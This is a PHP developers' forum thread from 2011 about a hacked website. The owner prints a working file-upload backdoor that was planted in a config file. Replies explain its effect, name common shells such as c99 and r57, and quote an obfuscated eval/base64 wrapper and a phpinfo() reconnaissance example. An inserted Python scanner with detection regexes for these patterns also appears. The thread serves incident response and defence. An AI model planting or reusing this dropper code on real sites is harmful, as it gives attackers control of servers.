PHP Developers Network

A community of PHP developers offering assistance, advice, discussion, and friendship.
 
 Post subject: My website hacked.
Posted: Thu Oct 13, 2011 4:59 am
Forum Newbie

Joined: Thu Oct 13, 2011 4:43 am
Posts: 2
Hello,

I have been a web developer for about 10 years. I was asked by a friend to make a site for him because his previous site was hacked and messed up. Now I think I keep my security pretty tight and was positive something like that wouldn't happen to my site. The dumb thing that I did was keep the old site on the server (friend asked me to because there were some pictures there that she wanted later). I just moved it to a whole new directory and renamed it to old_site or something.

Now one day I find out that something is wrong. First, there is an upload script written in one of my main config files, and second, someone has already uploaded something.
My main questions are:
1) I'm pretty sure the attack came somehow through the old_site that I kept (now deleted), but even so, how is it possible to directly edit my config file?
2) I was able to remove the upload script and the uploaded file, but I don't know what the uploaded file did. I'm going to post the script uploaded; can anyone guess what its purpose was?

The upload script in my config file:
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload BY akas06 [at] hackermail.com !!!</b><br><br>'; }
else { echo '<b>Upload BY akas06 [at] hackermail.com !!!</b><br><br>'; }
}
?>

The uploaded file: http://justpaste.it/jbw (a lot of code, so I copied it elsewhere)

Would be thankful for any help :)


 
 Post subject: Re: My website hacked.
Posted: Thu Oct 13, 2011 5:17 am
DevNet Master

Joined: Sun Feb 15, 2009 12:08 pm
Posts: 2794
Location: .za
The script copies a file; copy() overwrites the destination file if it exists so the attacker could have overwritten a system file with their own copy.

_________________
“Don’t worry if it doesn’t work right. If everything did, you’d be out of a job.” - Mosher’s Law of Software Engineering


 
 Post subject: Re: My website hacked.
Posted: Thu Oct 13, 2011 8:21 am
DevNet Resident

Joined: Sun Sep 03, 2006 5:19 am
Posts: 1579
Location: Sofia, Bulgaria


 
 Post subject: Re: My website hacked.
Posted: Thu Oct 13, 2011 9:06 am
DevNet Resident

Joined: Sun Jun 14, 2009 3:13 pm
Posts: 1146
I agree. The most common thing is a back door shell script is installed somewhere like c99 or r57. These tools are surprisingly efficient at compromising your server. Here's a tutorial on some of the things to look for in the log files.

http://25yearsofprogramming.com/blog/2010/20100315.htm

Yours looks like plain text, but a lot of these nasties start in an encrypted form of some sort and look like:
<? eval(gzinflate(base64_decode('FJ3HjuvKkkV/pWd9AQ7oHfDwLuiN6K3ISYOe ov.......on and on'))); ?>

By the way, you should hire Mordred to audit your system. There could easily be a hole in your new code that allows this upload. I always like to blame the other guy's code, but you don't want egg on your face if it happens again.
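
Added example, not part of any post in this thread: a small Python scanner for the two patterns quoted above, the upload dropper that writes `$_FILES[...]['name']` straight to disk and the `eval(gzinflate(base64_decode(...)))` wrapper. The rule names, regexes and sample strings are constructed for illustration; hits are leads for manual review, not verdicts.

```python
import re
from pathlib import Path

# Heuristic rules (assumptions of this example, modelled on the snippets in the thread).
RULES = {
    # eval() fed by a decode/decompress chain, e.g. eval(gzinflate(base64_decode('...')))
    "eval-decode-chain": re.compile(
        r"\beval\s*\(\s*(?:@?\s*(?:gzinflate|gzuncompress|gzdecode|str_rot13|base64_decode)\s*\(\s*)+",
        re.I),
    # Uploaded temp file written under the client-supplied file name, as in the dropper.
    "upload-to-client-name": re.compile(
        r"\b(?:copy|move_uploaded_file)\s*\(\s*\$_FILES\s*\[[^\]]+\]\s*\[\s*['\"]tmp_name['\"]\s*\]\s*,"
        r"\s*\$_FILES\s*\[[^\]]+\]\s*\[\s*['\"]name['\"]\s*\]", re.I),
    # Very long base64-looking string literal, typical of packed payloads.
    "long-base64-literal": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
}

def scan_text(text):
    """Return the sorted names of all rules that match the given PHP source."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan_tree(root, suffixes=(".php", ".phtml", ".inc")):
    """Walk root and return {path: [rule names]} for PHP-like files with a hit."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_text(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed samples: the first two imitate the code quoted in the thread,
# the third is an ordinary upload handler that should not be flagged.
SAMPLE_DROPPER = "<?php if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'ok'; } ?>"
SAMPLE_PACKED = "<? eval(gzinflate(base64_decode('" + "QUJD" * 60 + "'))); ?>"
SAMPLE_CLEAN = "<?php move_uploaded_file($_FILES['file']['tmp_name'], $dest); echo base64_decode($x); ?>"

if __name__ == "__main__":
    import sys
    # Usage: python scan.py /path/to/webroot
    for path, rules in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, ", ".join(rules))
```

Run it over the whole web root, including parked directories such as an old copy of the site, and compare hits against a known-good backup before deleting anything.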


 
 Post subject: Re: My website hacked.
Posted: Fri Oct 14, 2011 8:17 am
Forum Newbie

Joined: Thu Oct 13, 2011 4:43 am
Posts: 2


 
 Post subject: Re: My website hacked.
Posted: Fri Oct 14, 2011 9:28 am
DevNet Resident

Joined: Sun Sep 03, 2006 5:19 am
Posts: 1579
Location: Sofia, Bulgaria
@Donald, I have a standing offer for 3 free hours of whitebox audit, check this:

@Eric!: Thanks for the promotion man ;)


 
 Post subject: Re: My website hacked.
Posted: Fri Oct 14, 2011 9:58 am
DevNet Resident

Joined: Sun Jun 14, 2009 3:13 pm
Posts: 1146
You should start a website with your services and feedback from your free audits, including some sample results, your fees, etc. (Also so we can all sit around and try to hack it. :) )


 
 Post subject: Re: My website hacked.
Posted: Mon Oct 17, 2011 7:25 am
DevNet Resident

Joined: Sun Sep 03, 2006 5:19 am
Posts: 1579
Location: Sofia, Bulgaria
Haha. No :)
Most of the issues are boooring. "Didn't escape", "Didn't check the extension" ... boooring. I've seen some cool ones though, have to dig them up.

---
Ha, found one, it was a fun game:
I remember the Skeleton project having a funny homebrew escaping solution that I exploited, but I can't find my post about it :/


 
 Post subject: Re: My website hacked.
Posted: Thu Nov 10, 2011 1:04 am
Forum Newbie

Joined: Wed Nov 09, 2011 8:32 am
Posts: 5
Did someone upload a PHP script?
For example:
I can upload a PHP file with your script.
The PHP code is:
ad.php:
<?php
phpinfo();
?>
Then I can run this script in order to get information about your server.


 
 Post subject: Re: My website hacked.
Posted: Thu Nov 10, 2011 11:00 am
DevNet Resident

Joined: Sun Jun 14, 2009 3:13 pm
Posts: 1146
@mordred eval() is definitely full of fun exploits. I was thinking more along the lines of you distilling the examples into something more security focused and using them to illustrate how many programmers never even realize how many holes they open up. You could use this as part of an on-line portfolio to help demonstrate your skills and how often confident programmers unknowingly open up a can of worms...yada yada. So why the haha no?

